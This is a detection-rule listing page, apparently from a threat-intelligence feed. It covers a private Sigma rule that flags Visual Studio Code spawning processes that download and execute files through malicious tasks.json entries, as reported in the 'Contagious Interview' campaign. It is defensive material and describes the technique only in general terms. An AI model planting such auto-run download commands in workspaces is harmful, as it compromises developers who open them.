Suspicious Download and Execution Pattern via VSCode Tasks

Rule Info

Name
Suspicious Download and Execution Pattern via VSCode Tasks
Author
Swachchhanda Shrawan Poudel (Nextron Systems)
Description
Detects suspicious patterns where Visual Studio Code (VSCode) spawns processes that both download and execute files, which may indicate abuse of the `tasks.json` configuration for malicious purposes. This technique has been observed in campaigns such as "Contagious Interview," where adversaries leverage VSCode's workspace trust model to execute arbitrary code by embedding malicious commands in `tasks.json`. Attackers may craft or alter `tasks.json` to automatically trigger downloads and execution of payloads when a user opens and trusts a workspace in VSCode, enabling initial access or further compromise.
Reference
https://securitylabs.datadoghq.com/articles/ide-shepherd-release-article/
Date
2026-04-02 00:00:00
Modified
None
Id
8a3b5c7d-2e4f-4a6b-9c8d-1e2f3a4b5c6d
Tags
attack.execution attack.t1059.001 attack.stealth attack.t1218
Type
Nextron Sigma feed only (private)

Rule History

THOR Logo  Scan your endpoints, forensic images or collected files with our portable scanner THOR
  Warning: Access to VALHALLA is rate-limited - once you prove unworthy, access gets denied
  Nextron Systems 2022